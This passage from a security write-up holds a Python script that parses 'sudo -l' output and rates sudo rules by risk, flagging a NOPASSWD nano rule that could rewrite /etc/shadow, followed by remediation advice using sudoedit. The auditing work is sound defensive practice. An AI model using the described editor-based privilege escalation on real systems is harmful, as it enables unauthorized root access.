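    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    logfile=/var/log/sudo.log

User john may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/nano
    (root) /usr/sbin/service apache2 restart
"""

# "(runas) TAG: TAG: command args" as sudo prints it; one rule per line is assumed.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmdline>\S.*?)\s*$")

# Interactive editors: run as root they can rewrite any file (the writeup edits /etc/shadow with nano).
EDITORS = {"nano", "vi", "vim", "emacs"}  # assumption: extend for the environment


def parse_sudo_l(text: str) -> List[Dict]:
    """Extract the rules that follow the 'User X may run the following commands' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        command, _, args = m.group("cmdline").partition(" ")
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "command": command,
            "args": args,
        })
    return rules


def audit(rules: List[Dict]) -> List[Dict]:
    """Grade each rule. 'high' = unrestricted write as the run-as user; 'medium' = no
    password on a restricted command; 'info' = restricted command behind a password."""
    findings = []
    for rule in rules:
        base = os.path.basename(rule["command"])
        if base in EDITORS and not rule["args"]:
            risk = "high"
            reason = f"{base} as {rule['runas']} can open and rewrite any file, /etc/shadow included"
        elif rule["nopasswd"]:
            risk = "medium"
            reason = "NOPASSWD: the rule runs without re-authentication"
        else:
            risk = "info"
            reason = "restricted command, password required"
        if risk == "high" and rule["nopasswd"]:
            reason += "; NOPASSWD means no credential is needed at all"
        findings.append({**rule, "risk": risk, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"[{f['risk']:<6}] ({f['runas']}) {f['command']} {f['args']}".rstrip(), "-", f["reason"])
```

The remediation the grade points at is to pin the arguments (sudoers matches them literally) or, for configuration edits, to use sudoedit, which copies the file to a temporary location and writes it back only after the editor exits, instead of running the editor itself as root.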

Author : Puckiestyle